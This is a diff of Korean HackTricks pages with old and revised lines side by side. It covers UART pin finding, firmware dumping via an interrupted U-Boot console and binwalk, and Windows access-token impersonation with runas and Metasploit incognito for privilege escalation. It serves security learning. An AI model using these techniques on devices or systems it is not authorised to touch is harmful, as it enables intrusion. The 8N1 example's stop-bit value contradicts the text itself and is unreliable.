일반적으로 UART가 대기 상태일 때 라인은 높은 상태(논리 1 값)를 유지합니다. 그런 다음 송신기는 수신기에 시작 비트를 보내어 데이터 전송의 시작을 신호합니다. 이 동안 신호는 낮은 상태(논리 0 값)를 유지합니다. 그 다음 송신기는 실제 메시지를 포함하는 다섯 개에서 여덟 개의 데이터 비트를 보내고, 선택적으로 패리티 비트와 논리 1 값을 가진 하나 또는 두 개의 스톱 비트를 보냅니다. 오류 확인에 사용되는 패리티 비트는 실제로는 거의 보이지 않습니다. 스톱 비트(또는 비트)는 전송의 끝을 나타냅니다.
가장 일반적인 구성을 8N1이라고 합니다: 여덟 개의 데이터 비트, 패리티 없음 및 하나의 스톱 비트. 예를 들어, 8N1 UART 구성에서 문자 C 또는 ASCII에서 0x43을 보내려면 다음 비트를 보냅니다: 0(시작 비트); 0, 1, 0, 0, 0, 0, 1, 1(2진수 0x43의 값) 및 0(스톱 비트).
가장 일반적인 구성인 8N1을 사용합니다: 여덟 개의 데이터 비트, 패리티 없음 및 하나의 스톱 비트. 예를 들어, 8N1 UART 구성에서 문자 C 또는 ASCII에서 0x43을 보내려면 다음 비트를 보냅니다: 0(시작 비트); 0, 1, 0, 0, 0, 0, 1, 1(2진수 0x43의 값) 및 0(스톱 비트).
![](<../../.gitbook/assets/image (761).png>)
@ -46,18 +46,18 @@ UART와 통신하기 위한 하드웨어 도구:
### UART 포트 식별
UART에는 **TX**(송신), **RX**(수신), **Vcc**(전압) 및 **GND**(그라운드) 4개의 포트가 있습니다. PCB에 **`TX`** 및 **`RX`** 글자가 **쓰여진** 4개의 포트를 찾을 수 있습니다. 그러나 표시가 없는 경우, **멀티미터**나 **논리 분석기**를 사용하여 직접 찾아야 할 수 있습니다.
UART에는 **TX**(송신), **RX**(수신), **Vcc**(전압) 및 **GND**(그라운드) 4개의 포트가 있습니다. PCB에 **`TX`** 및 **`RX`** 글자가 **쓰여진** 4개의 포트를 찾을 수 있습니다. 그러나 표시가 없는 경우 **멀티미터** 또는 **로직 분석기**를 사용하여 직접 찾아야 할 수 있습니다.
**멀티미터**와 장치 전원을 끈 상태에서:
* **GND** 핀을 식별하려면 **연속성 테스트** 모드를 사용하여 백색 리드를 그라운드에 놓고 빨간색 리드로 테스트하여 멀티미터에서 소리가 들릴 때까지 테스트합니다. PCB에는 여러 GND 핀이 있을 수 있으므로 UART에 속한 핀을 찾았을 수도, 찾지 못했을 수도 있습니다.
* **VCC 포트**를 식별하려면 **DC 전압 모드**를 설정하고 20V 전압으로 설정합니다. 검은 프로브를 그라운드에 놓고 빨간 프로브를 핀에 놓습니다. 장치의 전원을 켭니다. 멀티미터가 3.3V 또는 5V의 일정한 전압을 측정하면 Vcc 핀을 찾은 것입니다. 다른 전압을 측정하면 다른 포트로 다시 시도하세요.
* **TX** **포트**를 식별하려면 **DC 전압 모드**를 최대 20V의 전압으로 설정하고 검은 프로브를 그라운드에 놓고 빨간 프로브를 핀에 놓고 장치의 전원을 켭니다. 전압이 몇 초 동안 변동한 다음 Vcc 값으로 안정화되면 대부분 TX 포트를 찾은 것입니다. 이는 전원을 켤 때 일부 디버그 데이터를 보내기 때문입니다.
* **GND** 핀을 식별하려면 **연속성 테스트** 모드를 사용하여 백색 리드를 그라운드에 놓고 빨간색 리드로 테스트하여 멀티미터에서 소리가 들릴 때까지 테스트합니다. PCB에는 여러 GND 핀이 있을 수 있으므로 UART에 속한 핀을 찾았을 수도, 아닐 수도 있습니다.
* **VCC 포트**를 식별하려면 **DC 전압 모드**를 설정하고 20V 전압으로 설정합니다. 검은 프로브를 그라운드에 놓고 빨간 프로브를 핀에 놓습니다. 장치의 전원을 켭니다. 멀티미터가 3.3V 또는 5V의 일정한 전압을 측정하면 Vcc 핀을 찾은 것입니다. 다른 전압을 얻으면 다른 포트로 다시 시도하세요.
* **TX** **포트**를 식별하려면 **DC 전압 모드**를 사용하여 20V 전압으로 설정하고, 검은 프로브를 그라운드에 놓고 빨간 프로브를 핀에 놓고 장치의 전원을 켭니다. 전압이 몇 초 동안 변동한 다음 Vcc 값으로 안정화되면 대부분 TX 포트를 찾은 것입니다. 이는 전원을 켤 때 일부 디버그 데이터를 보내기 때문입니다.
* **RX 포트**는 다른 3개의 포트 중에서 가장 가까운 위치에 있으며 UART 핀 중에서 가장 낮은 전압 변동과 전체 값이 가장 낮습니다.
TX와 RX 포트를 혼동해도 아무 일도 일어나지 않지만, GND와 VCC 포트를 혼동하면 회로를 손상시킬 수 있습니다.
일부 대상 장치에서 제조업체가 RX 또는 TX를 비활성화하여 UART 포트를 비활성화하는 경우가 있습니다. 이 경우 회로 기판에서 연결을 추적하고 일부 분기점을 찾는 것이 도움이 될 수 있습니다. UART를 감지하지 못하고 회로가 끊어진 것을 확인하는 강력한 힌트는 장치 보증을 확인하는 것입니다. 장치가 일부 보증으로 출하된 경우, 제조업체는 일부 디버그 인터페이스(이 경우 UART)를 남겨두고 있으며, 디버깅 중에 UART를 연결해야 하므로 UART를 연결하고 다시 연결할 것입니다. 이러한 분기 핀은 솔더링이나 점퍼 와이어로 연결할 수 있습니다.
일부 대상 장치에서 제조업체가 RX 또는 TX를 비활성화하여 UART 포트를 비활성화하는 경우가 있습니다. 이 경우 회로 기판에서 연결을 추적하고 일부 분기점을 찾는 것이 도움이 될 수 있습니다. UART를 감지하지 못하고 회로가 끊어진 것을 확인하는 강력한 힌트는 장치 보증을 확인하는 것입니다. 장치에 보증이 함께 제공된 경우 제조업체는 일부 디버그 인터페이스(이 경우 UART)를 남겨두고 있으며, 디버깅 중에 UART를 연결하고 다시 연결할 것입니다. 이러한 분기 핀은 솔더링이나 점퍼 와이어로 연결할 수 있습니다.
### UART 보드 속도 식별
@ -81,25 +81,25 @@ UART 인터페이스와의 기본 상호 작용을 위해 다음 명령을 사
```
picocom /dev/<adapter> --baud <baudrate>
```
minicom을 사용하려면 다음 명령을 사용하여 구성하십시오:
minicom을 구성하려면 다음 명령을 사용하십시오:
```
minicom -s
```
`시리얼 포트 설정` 옵션에서 보오드레이트와 장치 이름과 같은 설정을 구성합니다.
`Serial port setup` 옵션에서 보레이트 및 장치 이름과 같은 설정을 구성합니다.
구성 후 `minicom` 명령을 사용하여 UART 콘솔을 시작합니다.
## 아두이노 UNO R3를 통한 UART (탈착 가능한 Atmel 328p 칩 보드)
## Arduino UNO R3를 통한 UART (Atmel 328p 칩 보드 제거 가능)
UART 시리얼 대 USB 어댑터를 사용할 수 없는 경우, 아두이노 UNO R3를 빠른 해킹으로 사용할 수 있습니다. 아두이노 UNO R3는 일반적으로 어디서나 사용 가능하기 때문에 많은 시간을 절약할 수 있습니다.
UART 시리얼 대 USB 어댑터를 사용할 수 없는 경우, Arduino UNO R3를 빠른 해킹으로 사용할 수 있습니다. Arduino UNO R3는 일반적으로 어디서나 사용할 수 있으므로 많은 시간을 절약할 수 있습니다.
아두이노 UNO R3에는 보드 자체에 내장된 USB에서 시리얼 어댑터가 있습니다. UART 연결을 얻으려면 보드에서 Atmel 328p 마이크로컨트롤러 칩을 뽑기만 하면 됩니다. 이 해킹은 보드에 납땜되지 않은 Atmel 328p이 있는 아두이노 UNO R3 변형에서 작동합니다 (SMD 버전이 사용됨). 아두이노의 RX 핀 (디지털 핀 0)을 UART 인터페이스의 TX 핀에 연결하고, 아두이노의 TX 핀 (디지털 핀 1)을 UART 인터페이스의 RX 핀에 연결합니다.
Arduino UNO R3에는 보드 자체에 내장된 USB에서 시리얼 어댑터가 있습니다. UART 연결을 얻으려면 보드에서 Atmel 328p 마이크로컨트롤러 칩을 뽑기만 하면 됩니다. 이 해킹은 Atmel 328p가 보드에 납땜되지 않은 Arduino UNO R3 변형에서 작동합니다 (SMD 버전이 사용됨). Arduino의 RX 핀 (디지털 핀 0)을 UART 인터페이스의 TX 핀에 연결하고 Arduino의 TX 핀 (디지털 핀 1)을 UART 인터페이스의 RX 핀에 연결합니다.
마지막으로 UART 인터페이스에 맞게 보오드레이트를 설정하고 `도구` 섹션에서 `시리얼 콘솔` 옵션을 선택하는 것이 좋습니다.
마지막으로 UART 인터페이스에 따라 보레이트를 설정하고 Arduino IDE를 사용하는 것이 좋습니다. 메뉴의 `tools` 섹션에서 `Serial Console` 옵션을 선택하고 UART 인터페이스에 맞게 보레이트를 설정합니다.
## 버스 파이러트
## Bus Pirate
이 시나리오에서는 프로그램의 모든 출력을 시리얼 모니터로 보내는 아두이노의 UART 통신을 스니핑할 것입니다.
이 시나리오에서는 프로그램의 모든 출력을 시리얼 모니터로 보내는 Arduino의 UART 통신을 스니핑할 것입니다.
```bash
# Check the modes
UART>m
@ -173,38 +173,38 @@ waiting a few secs to repeat....
```
## UART 콘솔을 사용하여 펌웨어 덤프
UART 콘솔은 런타임 환경에서 기본 펌웨어를 다루는 훌륭한 방법을 제공합니다. 그러나 UART 콘솔 액세스가 읽기 전용인 경우, 많은 제약 사항을 도입할 수 있습니다. 많은 임베디드 장치에서 펌웨어는 EEPROM에 저장되고 휘발성 메모리를 갖는 프로세서에서 실행됩니다. 따라서 제조 중에 원래 펌웨어가 EEPROM 자체에 있으며 새 파일은 휘발성 메모리로 인해 손실될 수 있기 때문에 펌웨어는 읽기 전용으로 유지됩니다. 따라서 임베디드 펌웨어를 다룰 때 펌웨어 덤프는 귀중한 노력입니다.
UART 콘솔은 런타임 환경에서 기본 펌웨어를 다루는 훌륭한 방법을 제공합니다. 그러나 UART 콘솔 액세스가 읽기 전용인 경우 많은 제약 사항을 도입할 수 있습니다. 많은 임베디드 장치에서 펌웨어는 EEPROM에 저장되고 휘발성 메모리를 갖는 프로세서에서 실행됩니다. 따라서 제조 중에 원래 펌웨어가 EEPROM 자체에 있으며 새 파일은 휘발성 메모리로 인해 손실될 수 있기 때문에 펌웨어는 읽기 전용으로 유지됩니다. 따라서 임베디드 펌웨어를 다룰 때 펌웨어 덤프는 귀중한 노력입니다.
이를 수행하는 다양한 방법이 있으며 SPI 섹션에서는 다양한 장치를 사용하여 EEPROM에서 펌웨어를 직접 추출하는 방법을 다룹니다. 그러나 물리적 장치 및 외부 상호 작용을 사용하여 펌웨어를 덤프하는 것은 위험할 수 있으므로 먼저 UART를 사용하여 펌웨어를 덤프하는 것이 권장됩니다.
UART 콘솔에서 펌웨어를 덤프하려면 먼저 부트로더에 액세스해야 합니다. 많은 인기 있는 공급업체는 Linux을 로드하기 위해 <b>uboot</b> (Universal Bootloader)을 부트로더로 사용합니다. 따라서 <b>uboot</b>에 액세스하는 것이 필요합니다.
UART 콘솔에서 펌웨어를 덤프하려면 먼저 부트로더에 액세스해야 합니다. 많은 인기 있는 공급업체는 Linux을 로드하기 위해 부트로더로 <b>uboot</b> (Universal Bootloader)을 사용합니다. 따라서 <b>uboot</b>에 액세스하는 것이 필요합니다.
부트로더에 액세스하려면 UART 포트를 컴퓨터에 연결하고 시리얼 콘솔 도구 중 하나를 사용하고 장치에 전원을 공급하지 않은 상태로 유지해야 합니다. 설정이 준비되면 Enter 키를 누르고 누르고 유지합니다. 마지막으로 장치에 전원을 공급하고 부팅을 시작합니다.
부트로더에 액세스하려면 UART 포트를 컴퓨터에 연결하고 시리얼 콘솔 도구 중 하나를 사용하고 장치의 전원 공급을 끊어야 합니다. 설정이 준비되면 Enter 키를 누르고 누르고 있습니다. 마지막으로 장치에 전원을 연결하고 부팅을 시작합니다.
이렇게 하면 <b>uboot</b>의 로딩이 중단되고 메뉴가 제공됩니다. <b>uboot</b> 명령을 이해하고 도움말 메뉴를 사용하여 목록을 표시하는 것이 좋습니다. 이것은 `help` 명령일 수 있습니다. 다른 공급업체가 서로 다른 구성을 사용하기 때문에 각각을 별도로 이해하는 것이 필요합니다.
이렇게 하면 <b>uboot</b>의 로드가 중단되고 메뉴가 제공됩니다. <b>uboot</b> 명령을 이해하고 도움말 메뉴를 사용하여 목록을 표시하는 것이 좋습니다. 이것은 `help` 명령일 수 있습니다. 다른 공급업체가 서로 다른 구성을 사용하기 때문에 각각을 별도로 이해하는 것이 필요합니다.
일반적으로 펌웨어를 덤프하는 명령은 다음과 같습니다:
```
md
```
which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
"memory dump"의 약자입니다. 이는 화면에 메모리 (EEPROM 콘텐츠)를 덤프합니다. 메모리 덤프를 캡처하기 위해 proceedure를 시작하기 전에 Serial Console 출력을 기록하는 것이 좋습니다.
Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
마지막으로, 로그 파일에서 모든 불필요한 데이터를 제거하고 파일을 `filename.rom`으로 저장하고 binwalk를 사용하여 콘텐츠를 추출합니다:
```
binwalk -e <filename.rom>
```
이는 hex 파일에서 발견된 시그니처에 따라 EEPROM에서 가능한 내용을 나열할 것입니다.
EEPROM에서 발견된 시그니처에 따라 가능한 콘텐츠를 나열합니다.
그러나 사용 중인 경우에도 항상 <b>uboot</b>이 잠겨 있지 않을 수 있음을 유의해야 합니다. Enter 키가 작동하지 않는 경우, Space 키 등 다른 키를 확인하십시오. 부트로더가 잠겨 있고 중단되지 않으면이 방법은 작동하지 않습니다. <b>uboot</b>이 장치의 부트로더인지 확인하려면 장치 부팅 중 UART 콘솔의 출력을 확인하십시오. 부팅 중 <b>uboot</b>이 언급될 수 있습니다.
그러나 사용 중인 경우에도 항상 <b>uboot</b>이 잠겨 있지 않을 수 있음을 유의해야 합니다. Enter 키가 작동하지 않는 경우 Space 키 등 다른 키를 확인하십시오. 부트로더가 잠겨 있고 중단되지 않으면이 방법은 작동하지 않습니다. <b>uboot</b>이 장치의 부트로더인지 확인하려면 장치 부팅 중 UART 콘솔의 출력을 확인하십시오. 부팅 중 <b>uboot</b>이 언급될 수 있습니다.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사 또는 그 고객이 **stealer malwares**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 통해 기업이나 고객이 **stealer malwares**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공하는 검색 엔진입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 방지하는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시도해 볼 수 있습니다:
@ -217,10 +217,10 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에 광고하거나 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **HackTricks에서 귀하의 회사를 광고하거나 PDF로 다운로드하려면** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나**트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**팔로우하세요.**
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션을 만나보세요
* 💬 **Discord 그룹**에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 참여하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 귀하의 해킹 트릭을 공유하세요.
</details>

View file

@ -2,25 +2,25 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 영웅까지 AWS 해킹을 배우세요</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 영웅까지 AWS 해킹 배우기</strong></summary>
* **사이버 보안 회사**에서 일하시나요? **회사가 HackTricks에 광고**되길 원하시나요? 아니면 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드**하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인해보세요!
* **사이버 보안 회사**에서 일하시나요? **HackTricks에 귀사를 광고하고 싶으신가요**? 아니면 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요**? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인해보세요!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견해보세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 받아보세요
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 그룹**](https://discord.gg/hRep4RUj7f)이나 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **해킹 트릭을 공유하고 싶다면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **로 PR을 제출**하세요.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터**에서 저를 팔로우하세요 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **해킹 요령을 공유하고 싶으시다면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **로 PR을 제출하세요**.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **회사 또는 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로**해볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로**해볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -28,9 +28,9 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
## 액세스 토큰
시스템에 **로그인한 각 사용자는 해당 로그온 세션에 대한 보안 정보를 포함한 액세스 토큰을 보유**합니다. 사용자가 로그온할 때 시스템은 액세스 토큰을 생성합니다. 사용자를 대신하여 실행되는 **모든 프로세스에는 액세스 토큰의 사본**이 있습니다. 토큰은 사용자, 사용자의 그룹 및 사용자의 권한을 식별합니다. 또한 토큰에는 현재 로그온 세션을 식별하는 로그온 SID (보안 식별자)도 포함되어 있습니다.
시스템에 **로그인한 각 사용자는 해당 로그온 세션 보안 정보를 포함한 액세스 토큰을 보유**합니다. 사용자가 로그온할 때 시스템은 액세스 토큰을 생성합니다. 사용자를 대신하여 실행되는 **모든 프로세스에는 액세스 토큰의 사본이** 있습니다. 토큰은 사용자, 사용자의 그룹 및 사용자의 권한을 식별합니다. 또한 토큰에는 현재 로그온 세션을 식별하는 로그온 SID (보안 식별자)도 포함되어 있습니다.
`whoami /all`을 실행하여 이 정보를 확인할 수 있습니다.
이 정보는 `whoami /all`을 실행하여 확인할 수 있습니다.
```
whoami /all
@ -80,7 +80,7 @@ SeTimeZonePrivilege Change the time zone Disabled
### 로컬 관리자
로컬 관리자가 로그인하면 **두 개의 액세스 토큰이 생성**됩니다: 하나는 관리자 권한이 있고 다른 하나는 일반 권한이 있습니다. **기본적으로**이 사용자가 프로세스를 실행할 때는 **일반**(관리자가 아닌) **권한이 사용**됩니다. 이 사용자가 관리자로 **실행**하려고 할 때 ("관리자로 실행" 예를 들어) **UAC**가 권한을 요청하기 위해 사용됩니다.\
로컬 관리자가 로그인하면 **두 개의 액세스 토큰이 생성**됩니다: 하나는 관리자 권한이 있고 다른 하나는 일반 권한이 있습니다. **기본적으로**이 사용자가 프로세스를 실행할 때는 **일반**(관리자가 아닌) **권한이 사용됩니다**. 이 사용자가 관리자로 **실행**하려고 할 때 ("관리자로 실행" 예를 들어) **UAC**가 권한을 요청하기 위해 사용됩니다.\
[**UAC에 대해 자세히 알아보려면 이 페이지를 읽어보세요**](../authentication-credentials-uac-and-efs/#uac)**.**
### 자격 증명 사용자 위장
@ -90,26 +90,26 @@ SeTimeZonePrivilege Change the time zone Disabled
runas /user:domain\username cmd.exe
```
**액세스 토큰**에는 **LSASS** 내의 로그온 세션에 대한 **참조**도 있습니다. 이는 프로세스가 네트워크의 일부 객체에 액세스해야 할 때 유용합니다.\
네트워크 서비스에 액세스하는 데 **다른 자격 증명을 사용하는 프로세스를 실행**할 수 있습니다:
네트워크 서비스에 액세스하는 데 **다른 자격 증명을 사용하는 프로세스를 실행**할 수 있습니다.
```
runas /user:domain\username /netonly cmd.exe
```
이것은 네트워크 내의 객체에 액세스하기 위한 유용한 자격 증명이 있지만 해당 자격 증명이 현재 호스트 내에서 유효하지 않은 경우 유용합니다(현재 호스트에서는 현재 사용자 권한이 사용됩니다).
이것은 네트워크 내의 객체에 액세스하기 위한 유효한 자격 증명이 있지만 현재 호스트 내에서는 해당 자격 증명이 유효하지 않은 경우 유용합니다(현재 호스트에서는 현재 사용자 권한이 사용됩니다).
### 토큰 유형
사용 가능한 두 가지 유형의 토큰이 있습니다:
* **기본 토큰(Primary Token)**: 프로세스의 보안 자격 증명을 나타냅니다. 기본 토큰의 생성 및 프로세스와의 연결은 권한 상승이 필요한 작업으로, 권한 분리의 원칙을 강조합니다. 일반적으로 인증 서비스가 토큰 생성을 담당하며, 로그온 서비스가 사용자의 운영 체제 셸과의 연을 처리합니다. 프로세스는 생성 시 부모 프로세스의 기본 토큰을 상속합니다.
* **임시 토큰(Impersonation Token)**: 서버 응용 프로그램이 안전한 객체에 액세스하기 위해 일시적으로 클라이언트의 신원을 취할 수 있게 합니다. 이 메커니즘은 네 가지 수준의 작업으로 계층화됩니다:
* **기본 토큰(Primary Token)**: 프로세스의 보안 자격 증명을 나타냅니다. 기본 토큰의 생성 및 프로세스와의 연관은 권한을 상승시키는 조치로, 권한 분리의 원칙을 강조합니다. 일반적으로 인증 서비스가 토큰 생성을 담당하며, 로그온 서비스가 사용자의 운영 체제 셸과의 연을 처리합니다. 프로세스는 생성 시 부모 프로세스의 기본 토큰을 상속합니다.
* **임시 토큰(Impersonation Token)**: 서버 응용 프로그램이 안전한 객체에 액세스하기 위해 일시적으로 클라이언트의 신원을 취할 수 있게 합니다. 이 메커니즘은 네 가지 수준의 작동으로 나뉩니다:
* **익명(Anonymous)**: 식별되지 않은 사용자와 유사한 서버 액세스를 부여합니다.
* **식별(Identification)**: 객체 액세스에 사용하지 않고 클라이언트의 신원을 확인할 수 있게 합니다.
* **임시(Impersonation)**: 서버가 클라이언트의 신원으로 작동할 수 있게 합니다.
* **위임(Delegation)**: 임시와 유사하지만, 서버가 상호 작용하는 원격 시스템에 이 신원 가정을 확장할 수 있는 능력을 포함하여 자격 증명 보존을 보장합니다.
* **위임(Delegation)**: 임시와 유사하지만, 서버가 상호 작용하는 원격 시스템에 이 신원 가정을 확장할 수 있도록 하여 자격 증명을 보존합니다.
#### 토큰 변
#### 토큰 변
메타스플로잇의 _**incognito**_ 모듈을 사용하면 충분한 권한이 있다면 다른 **토큰**을 쉽게 **목록화**하고 **변장**할 수 있습니다. 이 기술을 사용하면 **다른 사용자인 것처럼 작업**을 수행하는 데 유용할 수 있습니다. 또한 이 기술로 **권한 상승**도 가능합니다.
메타스플로잇의 _**incognito**_ 모듈을 사용하여 충분한 권한이 있다면 다른 **토큰**을 쉽게 **목록화**하고 **변조**할 수 있습니다. 이 기술을 사용하면 **다른 사용자인 것처럼 작업**을 수행할 수 있어 유용할 수 있습니다. 또한 이 기술을 사용하여 **권한 상승**도 가능합니다.
### 토큰 권한
@ -123,17 +123,17 @@ runas /user:domain\username /netonly cmd.exe
## 참고 자료
이 튜토리얼에서 토큰에 대해 더 알아보세요: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) 및 [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
다음 자습서에서 토큰에 대해 더 알아보세요: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) 및 [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
WhiteIntel의 주요 목표는 정보 탈취 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로** 사용해보세요:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -141,10 +141,10 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**로부터 AWS 해킹을 처음부터 전문가까지 배우세요!</strong></summary>
* **사이버 보안 회사에서 일하시나요? 귀하의 회사를 HackTricks에서 광고하고 싶으신가요? 또는 최신 버전의 PEASS에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!**
* **사이버 보안 회사에서 일하시나요? 귀하의 회사를 HackTricks에서 광고하고 싶으신가요? 또는 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 얻으세요
* **[💬](https://emojipedia.org/speech-balloon/) [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 가입하거나 **트위터** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우하세요.**
* **해킹 트릭을 공유하려면 PR을 제출하여** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **에 참여하세요.**
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우하세요.**
* **해킹 트릭을 공유하려면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **로 PR을 제출하세요.**
</details>

View file

@ -4,30 +4,30 @@
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong></summary>
* **사이버 보안 회사**에서 일하시나요? **HackTricks에 귀사를 광고하고 싶으신가요**? 혹은 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드**하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인해보세요!
